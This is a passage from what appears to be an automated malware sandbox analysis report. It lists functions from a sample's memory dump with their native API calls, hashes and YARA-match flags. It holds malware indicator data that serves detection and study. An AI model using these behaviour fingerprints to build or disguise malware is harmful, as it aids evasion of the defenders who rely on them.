                                                                          • String ID: .z`
                                                                          • API String ID: 823142352-1441809116
                                                                          • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                          • Instruction ID: 97d9d8d91a0962b8fd7c176211d5ab3b90ace13326cdf3707132621265751461
                                                                          • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                          • Instruction Fuzzy Hash: D6F0B2B6200208AFCB08CF88DC84EEB77EDAF8C754F158248BA0D97240C630F8518BA4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 02858202, Relevance: 1.6, APIs: 1, Instructions: 74filenativeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • NtReadFile.NTDLL(02853D42,5E972F59,FFFFFFFF,02853A01,?,?,02853D42,?,02853A01,FFFFFFFF,5E972F59,02853D42,?,00000000), ref: 028582A5
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.475870538.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FileRead
                                                                          • String ID:
                                                                          • API String ID: 2738559852-0
                                                                          • Opcode ID: 9d8a25044acc39722e68f8a86a13e88449271d1df652afea1035039b7b4b1b03
                                                                          • Instruction ID: 7c3180a9484dcb4a2d5827bc25a70268e0d0ff462cb2e904b620ca1920ec481a
                                                                          • Opcode Fuzzy Hash: 9d8a25044acc39722e68f8a86a13e88449271d1df652afea1035039b7b4b1b03
                                                                          • Instruction Fuzzy Hash: 1121F4B6200118AFDB18DF99CC80EEB77A9AF8C754F158249FE0DA7241D630EC51CBA0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 02858260, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • NtReadFile.NTDLL(02853D42,5E972F59,FFFFFFFF,02853A01,?,?,02853D42,?,02853A01,FFFFFFFF,5E972F59,02853D42,?,00000000), ref: 028582A5
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.475870538.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FileRead
                                                                          • String ID:
                                                                          • API String ID: 2738559852-0
                                                                          • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                          • Instruction ID: ca4a32951ad5318115556c0d7f97dae7a9d00866f989dcf2c1f7b38999349e8d
                                                                          • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                          • Instruction Fuzzy Hash: CDF0A4B6200208AFCB14DF89DC80EEB77ADAF8C754F158249BE1D97241DA30E8518BA0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0285838A, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02842D11,00002000,00003000,00000004), ref: 028583C9
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.475870538.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AllocateMemoryVirtual
                                                                          • String ID:
                                                                          • API String ID: 2167126740-0
                                                                          • Opcode ID: 7e38236435f6ced52ad85efe9aaaa3be57f39ad4a977b264b606ab2a87bd78ff
                                                                          • Instruction ID: cb7f9d39dc262554b2ecdeaf004602491bb1949d55c207a5437b9ec436c8afc9
                                                                          • Opcode Fuzzy Hash: 7e38236435f6ced52ad85efe9aaaa3be57f39ad4a977b264b606ab2a87bd78ff
                                                                          • Instruction Fuzzy Hash: 78F0FE75600119AFCB14DF98DC84EEB77A9EF88354F158649FE1997251C631E811CFA0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 02858390, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02842D11,00002000,00003000,00000004), ref: 028583C9
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.475870538.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AllocateMemoryVirtual
                                                                          • String ID:
                                                                          • API String ID: 2167126740-0
                                                                          • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                          • Instruction ID: 44394c2a7db75327fa43c4b953912e3d8628406f59a9ca0c92c5da0e1abdd7c7
                                                                          • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                          • Instruction Fuzzy Hash: EDF015B6200218AFCB14DF89CC80EEB77ADAF88750F118149BE0897241C630F810CBE0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 028582E0, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • NtClose.NTDLL(02853D20,?,?,02853D20,00000000,FFFFFFFF), ref: 02858305
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.475870538.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Close
                                                                          • String ID:
                                                                          • API String ID: 3535843008-0
                                                                          • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                          • Instruction ID: d0eb2b5b211a90960abdb6004fcf7f9b55c9c211b1bb5a3aee07e8e898c94f64
                                                                          • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                          • Instruction Fuzzy Hash: 99D012752002146BD710EF98CC45ED7779DEF44750F154455BA189B241C530F9008AE0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 046B9860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.476522146.0000000004650000.00000040.00000001.sdmp, Offset: 04650000, based on PE: true
                                                                          • Associated: 00000007.00000002.476968277.000000000476B000.00000040.00000001.sdmp Download File
                                                                          • Associated: 00000007.00000002.476980303.000000000476F000.00000040.00000001.sdmp Download File
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: a7018e46a746690ce38467b01874ee5bd12ee19233ff222b4f63d9a3ef2398dd
                                                                          • Instruction ID: cc47e38e9caf71ed52cf5ddcadc268a0e0cd18eebe3ef93d9a0935969bd0d9d1
                                                                          • Opcode Fuzzy Hash: a7018e46a746690ce38467b01874ee5bd12ee19233ff222b4f63d9a3ef2398dd
                                                                          • Instruction Fuzzy Hash: 379002B120100413F21165594505717000DD7D0285F91C426A0415598DA696D952B1A1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 046B9840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.476522146.0000000004650000.00000040.00000001.sdmp, Offset: 04650000, based on PE: true
                                                                          • Associated: 00000007.00000002.476968277.000000000476B000.00000040.00000001.sdmp Download File
                                                                          • Associated: 00000007.00000002.476980303.000000000476F000.00000040.00000001.sdmp Download File
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 3fd7940f53a09f5b48c5ea258f227145dd958f559dadd95f76f2b087ff3605e3
                                                                          • Instruction ID: e1f0ef15b15207d570d27ce2f43c55f26dd77c2ba3f4d94a4276df0c0917905a
                                                                          • Opcode Fuzzy Hash: 3fd7940f53a09f5b48c5ea258f227145dd958f559dadd95f76f2b087ff3605e3
                                                                          • Instruction Fuzzy Hash: 779002A1242041527645B5594405517400AE7E0285791C026A1405990C9566E856E6A1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 046B9540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.476522146.0000000004650000.00000040.00000001.sdmp, Offset: 04650000, based on PE: true
                                                                          • Associated: 00000007.00000002.476968277.000000000476B000.00000040.00000001.sdmp Download File
                                                                          • Associated: 00000007.00000002.476980303.000000000476F000.00000040.00000001.sdmp Download File
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 8f224163c9e8383e6cea7c3f8e7e2ec8b1a991c042d939634d49dfa6456e0a33
                                                                          • Instruction ID: b47d214d3ecd89268f7a9ac40ee40c0c09a95b4df4dfc6012e25e7463686202c
                                                                          • Opcode Fuzzy Hash: 8f224163c9e8383e6cea7c3f8e7e2ec8b1a991c042d939634d49dfa6456e0a33
                                                                          • Instruction Fuzzy Hash: 4A9002A5211000032205A9590705517004AD7D5395351C035F1006590CE661D86161A1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 046B9910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.476522146.0000000004650000.00000040.00000001.sdmp, Offset: 04650000, based on PE: true
                                                                          • Associated: 00000007.00000002.476968277.000000000476B000.00000040.00000001.sdmp Download File
                                                                          • Associated: 00000007.00000002.476980303.000000000476F000.00000040.00000001.sdmp Download File
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 19d018c338dc8bbbf155fdceadeecc701ab2f18345ce5172de39ffc6952320d7
                                                                          • Instruction ID: b41aab1a3f81580dd0694e2a6c86609b827ad811a251c4124290e89bf6fe5fc6
                                                                          • Opcode Fuzzy Hash: 19d018c338dc8bbbf155fdceadeecc701ab2f18345ce5172de39ffc6952320d7
                                                                          • Instruction Fuzzy Hash: 909002F120100402F240755944057560009D7D0345F51C025A5055594E9699DDD576E5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 046B95D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.476522146.0000000004650000.00000040.00000001.sdmp, Offset: 04650000, based on PE: true
                                                                          • Associated: 00000007.00000002.476968277.000000000476B000.00000040.00000001.sdmp Download File
                                                                          • Associated: 00000007.00000002.476980303.000000000476F000.00000040.00000001.sdmp Download File
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: f19b99a9c71eab55181401adbca10ae442ce3a215223110ac335c257ce067dcf
                                                                          • Instruction ID: f8593a61f30c7a95630cf540eb6516f6f96ec1806d1a419c4a563047b9452567
                                                                          • Opcode Fuzzy Hash: f19b99a9c71eab55181401adbca10ae442ce3a215223110ac335c257ce067dcf
                                                                          • Instruction Fuzzy Hash: 479002E120200003620575594415626400ED7E0245B51C035E10055D0DD565D89171A5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 046B99A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.476522146.0000000004650000.00000040.00000001.sdmp, Offset: 04650000, based on PE: true
                                                                          • Associated: 00000007.00000002.476968277.000000000476B000.00000040.00000001.sdmp Download File
                                                                          • Associated: 00000007.00000002.476980303.000000000476F000.00000040.00000001.sdmp Download File
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 6b86fd5bbd152ce489cc0b64ae4d5ecd2ada15b638f5e130189756c7bf38dcdc
                                                                          • Instruction ID: e7d004238f6ee7cd4b2823a6a2e2f70ec81ae13d6ea49f43aa8e5edffe46842a
                                                                          • Opcode Fuzzy Hash: 6b86fd5bbd152ce489cc0b64ae4d5ecd2ada15b638f5e130189756c7bf38dcdc
                                                                          • Instruction Fuzzy Hash: 2F9002E134100442F20065594415B160009D7E1345F51C029E1055594D9659DC5271A6
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 046B9660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.476522146.0000000004650000.00000040.00000001.sdmp, Offset: 04650000, based on PE: true
                                                                          • Associated: 00000007.00000002.476968277.000000000476B000.00000040.00000001.sdmp Download File
                                                                          • Associated: 00000007.00000002.476980303.000000000476F000.00000040.00000001.sdmp Download File
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 15e3b4ebf3a8bf156fe86051cd4016045359e04b18b74187f15b73b264581842
                                                                          • Instruction ID: f626138f1f518ec6b60b335acf86a9141c185630aa92dacee3510aeea5966278
                                                                          • Opcode Fuzzy Hash: 15e3b4ebf3a8bf156fe86051cd4016045359e04b18b74187f15b73b264581842
                                                                          • Instruction Fuzzy Hash: CC9002B120100802F2807559440565A0009D7D1345F91C029A0016694DDA55DA5977E1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 046B9A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.476522146.0000000004650000.00000040.00000001.sdmp, Offset: 04650000, based on PE: true
                                                                          • Associated: 00000007.00000002.476968277.000000000476B000.00000040.00000001.sdmp Download File
                                                                          • Associated: 00000007.00000002.476980303.000000000476F000.00000040.00000001.sdmp Download File
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 0532d9c9644c8055cbf14555a325e7b2d5c9310b335f26e187821db776bf8e7e
                                                                          • Instruction ID: 4f4efda18cb6012487f81c79f046451fc914b2df94c248e0a60b3676319a630b
                                                                          • Opcode Fuzzy Hash: 0532d9c9644c8055cbf14555a325e7b2d5c9310b335f26e187821db776bf8e7e
                                                                          • Instruction Fuzzy Hash: 379002A121180042F30069694C15B170009D7D0347F51C129A0145594CD955D86165A1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 046B9650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.476522146.0000000004650000.00000040.00000001.sdmp, Offset: 04650000, based on PE: true
                                                                          • Associated: 00000007.00000002.476968277.000000000476B000.00000040.00000001.sdmp Download File
                                                                          • Associated: 00000007.00000002.476980303.000000000476F000.00000040.00000001.sdmp Download File
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 3083fedd75df7e21d46403122f1cf65c65476280a6b0149e1327e2111dc3e2a0
                                                                          • Instruction ID: 6bf1cb66484040a8cb55efa6797a5a0a1c67a550df50d5aae33aeca96a7760f8
                                                                          • Opcode Fuzzy Hash: 3083fedd75df7e21d46403122f1cf65c65476280a6b0149e1327e2111dc3e2a0
                                                                          • Instruction Fuzzy Hash: 239002B120504842F24075594405A560019D7D0349F51C025A00556D4DA665DD55B6E1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 046B96E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.476522146.0000000004650000.00000040.00000001.sdmp, Offset: 04650000, based on PE: true
                                                                          • Associated: 00000007.00000002.476968277.000000000476B000.00000040.00000001.sdmp Download File
                                                                          • Associated: 00000007.00000002.476980303.000000000476F000.00000040.00000001.sdmp Download File
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 9f082d881cac96ba66d9c20e9abbdbf6e79c18c42e1bb474ff78a66deeecb9fb
                                                                          • Instruction ID: 56621bb4ccfec84a9aba4cd08b49b5db19f02b027a837ab2a3e6efd56955ebca
                                                                          • Opcode Fuzzy Hash: 9f082d881cac96ba66d9c20e9abbdbf6e79c18c42e1bb474ff78a66deeecb9fb
                                                                          • Instruction Fuzzy Hash: 129002B120108802F2106559840575A0009D7D0345F55C425A4415698D96D5D89171A1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 046B96D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.476522146.0000000004650000.00000040.00000001.sdmp, Offset: 04650000, based on PE: true
                                                                          • Associated: 00000007.00000002.476968277.000000000476B000.00000040.00000001.sdmp Download File
                                                                          • Associated: 00000007.00000002.476980303.000000000476F000.00000040.00000001.sdmp Download File
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: c9cc6f4284beea8e9ae6a3fe89f37299cc77680db6ef65838cd567da1b00a36e
                                                                          • Instruction ID: e42d6b1c6bec700a51763fe61b742691c6be008e54281a98845c71772107aa51
                                                                          • Opcode Fuzzy Hash: c9cc6f4284beea8e9ae6a3fe89f37299cc77680db6ef65838cd567da1b00a36e
                                                                          • Instruction Fuzzy Hash: 0E9002B120100842F20065594405B560009D7E0345F51C02AA0115694D9655D85175A1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 046B9710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.476522146.0000000004650000.00000040.00000001.sdmp, Offset: 04650000, based on PE: true
                                                                          • Associated: 00000007.00000002.476968277.000000000476B000.00000040.00000001.sdmp Download File
                                                                          • Associated: 00000007.00000002.476980303.000000000476F000.00000040.00000001.sdmp Download File
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 2d63ccb6a21f3fc96c21a1c5ef4ab659e752125a6cf7a658c9cbe74120c63809
                                                                          • Instruction ID: 407fbf44aa45f4cf6ee4788f9ca7c4c2e8ddbedf02016b2ade68aa7eda5df164
                                                                          • Opcode Fuzzy Hash: 2d63ccb6a21f3fc96c21a1c5ef4ab659e752125a6cf7a658c9cbe74120c63809
                                                                          • Instruction Fuzzy Hash: DA9002B120100402F200699954096560009D7E0345F51D025A5015595ED6A5D89171B1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 046B9FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.476522146.0000000004650000.00000040.00000001.sdmp, Offset: 04650000, based on PE: true
                                                                          • Associated: 00000007.00000002.476968277.000000000476B000.00000040.00000001.sdmp Download File
                                                                          • Associated: 00000007.00000002.476980303.000000000476F000.00000040.00000001.sdmp Download File
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 743e5c4395c49de44b6c59dec6644b48182f1b32a7c25a5b2c47486c6e5e4b84
                                                                          • Instruction ID: f68f9458739d0bdb2e210f5504eade3a4c668ed78ce3f91986b2db9830fbb10e
                                                                          • Opcode Fuzzy Hash: 743e5c4395c49de44b6c59dec6644b48182f1b32a7c25a5b2c47486c6e5e4b84
                                                                          • Instruction Fuzzy Hash: 749002B131114402F210655984057160009D7D1245F51C425A0815598D96D5D89171A2
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 046B9780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.476522146.0000000004650000.00000040.00000001.sdmp, Offset: 04650000, based on PE: true
                                                                          • Associated: 00000007.00000002.476968277.000000000476B000.00000040.00000001.sdmp Download File
                                                                          • Associated: 00000007.00000002.476980303.000000000476F000.00000040.00000001.sdmp Download File
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: e1cc64ce73d935eee833be0aa79173402debf4ece21432fdcd3b3f494a9e11c5
                                                                          • Instruction ID: ecee8e5ac49caa568783f05e17801b4d8ff93ac0feb5246c580a2c415fbe1878
                                                                          • Opcode Fuzzy Hash: e1cc64ce73d935eee833be0aa79173402debf4ece21432fdcd3b3f494a9e11c5
                                                                          • Instruction Fuzzy Hash: 709002A921300002F2807559540961A0009D7D1246F91D429A0006598CD955D86963A1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 02856ED0, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • Sleep.KERNELBASE(000007D0), ref: 02856F78
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.475870538.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Sleep
                                                                          • String ID: net.dll$wininet.dll
                                                                          • API String ID: 3472027048-1269752229
                                                                          • Opcode ID: 0377487b5bc0d6e3e2113dcd04d2b03c24b99bd3fee77e5670c6c2139befbc39
                                                                          • Instruction ID: ae7f4a450c09403189f2f0f0497ecf94fdfbbbc63dc57d83add79b1393c4b136
                                                                          • Opcode Fuzzy Hash: 0377487b5bc0d6e3e2113dcd04d2b03c24b99bd3fee77e5670c6c2139befbc39
                                                                          • Instruction Fuzzy Hash: 2731A4B9A01714ABD711DF68C8A0FA7B7B9BB48704F40841DFA1EAB640E730B445CBE1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 02856EC8, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 81sleepCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • Sleep.KERNELBASE(000007D0), ref: 02856F78
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.475870538.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Sleep
                                                                          • String ID: net.dll$wininet.dll
                                                                          • API String ID: 3472027048-1269752229
                                                                          • Opcode ID: 9b3ea39cac72efb8a607cf0a133548bc3817aae7e6172a808734b21e630211f9
                                                                          • Instruction ID: 7c97be1af0e6ddc5d6b26444d1b1aa7a88fcc317856f1838e8ad84a76c3f8928
                                                                          • Opcode Fuzzy Hash: 9b3ea39cac72efb8a607cf0a133548bc3817aae7e6172a808734b21e630211f9
                                                                          • Instruction Fuzzy Hash: EB21A7B9901714ABD710DF58C8A1F6BBBB9BB48704F40801DF91DAB645E770A445CBE1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 028584B3, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02843B93), ref: 028584ED
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.475870538.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FreeHeap
                                                                          • String ID: .z`
                                                                          • API String ID: 3298025750-1441809116
                                                                          • Opcode ID: ef553c98d1d7c9067f286b7b54b0ddd8f41f5ccd2ef0982be0dddc65e8bcfcd9
                                                                          • Instruction ID: e60ba9f6c8d0b5b47c4ab6e10ca2c36ef8b31e3151aab12662261a61e244abe5
                                                                          • Opcode Fuzzy Hash: ef553c98d1d7c9067f286b7b54b0ddd8f41f5ccd2ef0982be0dddc65e8bcfcd9
                                                                          • Instruction Fuzzy Hash: 3EE0A979200204AFDB18DF58CC89E97B7A8EF88310F014085FD185B241C230E920CBE0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 028584C0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02843B93), ref: 028584ED
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.475870538.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FreeHeap
                                                                          • String ID: .z`
                                                                          • API String ID: 3298025750-1441809116
                                                                          • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                          • Instruction ID: abac93e42eb3719df9b9a67dbd67895ccb062ebd1cf1ddfe77fe914d5fb41491
                                                                          • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                          • Instruction Fuzzy Hash: 16E012B5200218ABDB18EF99CC48EA777ADAF88750F018559BE089B241CA30F9108AF0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 02847260, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 028472BA
                                                                          • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 028472DB
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.475870538.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: MessagePostThread
                                                                          • String ID:
                                                                          • API String ID: 1836367815-0
                                                                          • Opcode ID: 53e5322b62eb909e761c59486e91cb807ee3ea7040c4705f1c47c4bf58bd69dc
                                                                          • Instruction ID: 19892b4ea1582deb4960e725a2070ade9ebaf68d1e3b4b7b56705b2e6d5a5419
                                                                          • Opcode Fuzzy Hash: 53e5322b62eb909e761c59486e91cb807ee3ea7040c4705f1c47c4bf58bd69dc
                                                                          • Instruction Fuzzy Hash: B0018439A8023877EB21A6989C42FFE766D5B00B50F140155FF04FA1C1EB94690646E6
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 02847233, Relevance: 3.0, APIs: 2, Instructions: 40threadwindowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 028472BA
                                                                          • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 028472DB
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.475870538.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: MessagePostThread
                                                                          • String ID:
                                                                          • API String ID: 1836367815-0
                                                                          • Opcode ID: 3c8b7939087fd3a5e1440ee25145acdcf257e98b6914ad36ed10a8e174015249
                                                                          • Instruction ID: bab6e9a1e0592821b57df93925cfd0221bbca2ba19a921cad874c3bb5a5c39c1
                                                                          • Opcode Fuzzy Hash: 3c8b7939087fd3a5e1440ee25145acdcf257e98b6914ad36ed10a8e174015249
                                                                          • Instruction Fuzzy Hash: 7EF0E53D7C023836E72151941C02FBEA24D5B40F50F14016AFF04FA1C0EBC4A80606E2
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 02849B10, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02849B82
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.475870538.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Load
                                                                          • String ID:
                                                                          • API String ID: 2234796835-0
                                                                          • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                          • Instruction ID: 02ba36f67ed0b5114aaca9ae20134b0be711a1b11c610e9f17da9f58f2db8d9e
                                                                          • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
